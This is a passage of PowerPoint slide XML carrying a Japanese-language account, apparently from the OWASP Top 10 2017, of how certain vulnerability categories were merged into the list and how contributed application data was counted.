                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Exposure of Private Information</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、明確に重大な脆弱性ですが、既存の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>機微な情報の露出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に含まれています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Cryptographic Failures</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>機微な情報の露出</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に含まれています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>A8:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>安全でないデシリアライゼーション</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に位置付けました。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>番目の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>User-Controlled Key</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>A5:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>アクセス制御の不備</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に含めています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>調査においてはより上位のランクとすべきといった意見もありましたが、認可の脆弱性に関連するデータが十分ではなかったため</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>A5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>としています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>番目の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>A10:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="" action="ppaction://noaction"/>
                        </a:rPr>
                        <a:t>不十分なロギングとモニタリング</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>として位置付けました。 アプリケーションは何が攻撃になり得るのか定義し、適切なロギング、アラート、エスカレーション、レスポンスを生成できる必要があり、その点を考慮しました。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="0" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </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1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>データ提供依頼</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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44163525"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3578924">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>一般的に、収集され分析されたデータはテストしたアプリケーションで検出した脆弱性の数の頻データに沿っています。よく知られているように、ツールは脆弱性のすべてのインスタンスを報告し、人がその中から単一の結果を報告します。この</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>つの種類のレポートを同等の方法で集計するのは非常に困難です。 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>においては、与えられたデータセットのうち</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>つまたは複数の特定のデータ・セットを持つアプリケーションの数に基づき、発生率を計算しました。より多くの貢献者から</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>つの観点で情報を提供いただきました。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>つ目は、脆弱性のすべてのインスタンスを数える従来の頻度スタイルであり、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>つ目は、脆弱性が</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>回またはそれ以上検出されたアプリケーションの数です。完璧ではありませんが、これにより、ツールの結果と人の結果の双方を比較することができます。ローデータ及び分析作業結果は</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0" err="1">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>でご確認いただけます</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>。次以降の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>のバージョンに向け、この方法をさらに拡張していく予定です。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>この度のデータ提供依頼（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CFD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>）においては、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>40</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>セット以上の情報を提供いただきました。これらのほとんどは、頻度に焦点を当てたデータだったため、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>23</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>の貢献者からの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>114,000</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>以上のアプリケーションをカバーする情報を利用することができました。 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>年かけて貢献者の特定を行いました。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0" err="1">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>からの年間のデータには繰り返し登場するアプリケーションがあることを認識していましたが、大半のアプリケーションは独自のものでした。使用した</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>23</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>のデータは、ツールの結果または人の結果のいずれかに区別しました。 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>以上の発生率となったデータは最大値が</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="950" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
